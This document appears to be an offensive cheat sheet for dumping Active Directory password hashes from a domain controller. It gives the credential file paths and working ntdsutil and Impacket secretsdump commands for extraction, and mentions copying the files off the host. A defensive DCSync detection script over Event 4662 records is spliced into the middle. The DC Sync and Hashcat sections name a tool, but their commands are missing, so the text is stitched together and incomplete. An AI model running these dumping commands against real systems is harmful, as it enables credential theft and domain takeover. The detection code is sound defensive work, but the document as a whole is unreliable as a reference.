NTDS Domain Controller
NTDS (the Active Directory database) stores domain-related information, including account password hashes, in Windows domain environments. Extracting the secrets requires three files from a domain controller:
NTDS database:
C:\Windows\NTDS\ntds.dit
SYSTEM registry hive (contains the boot key that protects the database):
C:\Windows\System32\config\SYSTEM
SECURITY registry hive (contains LSA secrets):
C:\Windows\System32\config\SECURITY
Local Dumping (No Credentials)
To access the NTDS database locally, use the following PowerShell command:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
We can then copy ntds.dit, SYSTEM and SECURITY off the host using scp.
Next, use the Impacket suite to extract the hashes from the collected files:
python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local
Remote Dumping (With Credentials)
DC Sync is possible when an account has one of the following permissions:
Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes in Filtered Set
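The three rights above are what a domain controller audits (Event ID 4662, "Audit Directory Service Access") when any principal replicates directory changes, so a defender can spot DCSync by looking for those control access rights requested by anything other than a domain controller's machine account. The following is an added detection example, not part of the original notes; it runs on constructed, flattened key=value records rather than raw EVTX, and the DC names in KNOWN_DCS are assumed:

```python
import re

# Control access right GUIDs logged in the Properties field of Event ID 4662
# when the corresponding replication right is exercised.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "Replicating Directory Changes In Filtered Set",
}

# Machine accounts of the domain controllers, which replicate legitimately
# (assumed names for this example).
KNOWN_DCS = {"DC01$", "DC02$"}

# Constructed sample events, flattened to one "key=value;..." line each.
SAMPLE_EVENTS = [
    "EventID=4662;SubjectUserName=DC02$;ObjectType=domainDNS;AccessMask=0x100;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jdoe;ObjectType=domainDNS;AccessMask=0x100;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=svc_backup;ObjectType=domainDNS;AccessMask=0x100;"
    "Properties={89e95b76-444d-4c62-991a-0facbeda640c}",
    "EventID=4662;SubjectUserName=jdoe;ObjectType=user;AccessMask=0x20;"
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624;SubjectUserName=jdoe;LogonType=3",
]


def parse_event(line):
    """Split a flattened 'key=value;key=value' record into a dict."""
    return dict(re.findall(r"(\w+)=([^;]+)", line))


def flag_dcsync(events, known_dcs=KNOWN_DCS):
    """Return (account, [rights]) for every 4662 event in which a non-DC
    principal requested one or more directory replication rights."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = {g.lower() for g in re.findall(r"[0-9a-f-]{36}", ev.get("Properties", ""), re.I)}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if rights and ev.get("SubjectUserName") not in known_dcs:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in flag_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Event 4662 is only generated when directory service access auditing is enabled and the domain object carries a SACL for these rights, so verify that configuration before relying on this logic.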
To dump hashes remotely with DC Sync, use Impacket:
Cracking NTLM Hashes
Once NTLM hashes are obtained, they can be used for impersonation or cracked to retrieve the password. To crack the hash, use Hashcat: